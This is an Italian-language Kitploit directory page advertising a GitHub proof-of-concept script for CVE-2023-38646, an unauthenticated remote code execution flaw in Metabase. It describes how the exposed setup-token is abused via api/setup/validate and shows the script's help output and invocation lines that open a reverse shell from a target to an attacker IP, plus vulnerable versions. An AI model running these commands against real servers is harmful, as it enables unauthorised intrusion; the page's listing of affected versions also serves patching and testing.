Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38646 — Metabase open source prima della 0.46.6.1 e Metabase Enterprise prima della 1.46.6.1 consentono agli attaccanti di eseguire comandi arbitrari sul server, al livello di privilegio del server. L'autenticazione non è richiesta per lo sfruttamento. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2. | Kitploit
Strumenti/GitHubGitHub/ego1stoo/cve-2023-38646
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubego1stoo/cve-2023-38646

CVE-2023-38646

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

12 anni faNon ancora revisionato

Metabase open source prima della 0.46.6.1 e Metabase Enterprise prima della 1.46.6.1 consentono agli attaccanti di eseguire comandi arbitrari sul server, al livello di privilegio del server. L'autenticazione non è richiesta per lo sfruttamento. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.

Condividi

CVE-2023-38646 Metabase RCE pre-autenticazione (11/26/2023)

Le versioni di Metabase open source precedenti alla 0.46.6.1 e di Metabase Enterprise precedenti alla 1.46.6.1 consentono agli aggressori di eseguire comandi arbitrari sul server, al livello di privilegio del server. Per lo sfruttamento non è richiesta l'autenticazione. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.

La vulnerabilità è presente nell'applicazione che espone lo setup-token, che può essere utilizzato per validare il database tramite api/setup/validate. Un utente non autorizzato può creare un codice dannoso ed eseguire comandi arbitrari.

Disclaimer

USO A PROPRIO RISCHIO

Questo script è fornito a scopo educativo e di test. L'autore non è responsabile per qualsiasi uso improprio o danno causato dal suo utilizzo. Assicurati di rispettare le leggi applicabili e gli standard etici. Utilizzando questo script, dichiari di riconoscere e accettare questi termini.

Metabase

Metabase è uno strumento open source di business intelligence che consente di creare grafici e dashboard utilizzando dati provenienti da una varietà di database e fonti dati. È un progetto popolare, con oltre 33k stelle su GitHub, ed è stato oggetto di notevole attenzione dal punto di vista della ricerca sulle vulnerabilità negli ultimi anni.

Proof of Concept

Comandi

root@kitploit:~
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            show this help message and exit
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Hostname of the target.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port of the Target Machine (default: Port 80)
  -p PORT, --port PORT  Port for reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Your IP Adress

Puoi eseguire lo script utilizzando il comando seguente. Puoi cambiare la porta remota utilizzando l'opzione -rp. La porta predefinita è la 80.

root@kitploit:~
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
root@kitploit:~
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

image

Versioni Vulnerabili

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

Riferimenti

  • Packet storm security Metabase-Remote-Code-Execution
  • NVD CVE-2023-38646 Dettagli
Scarica lo strumento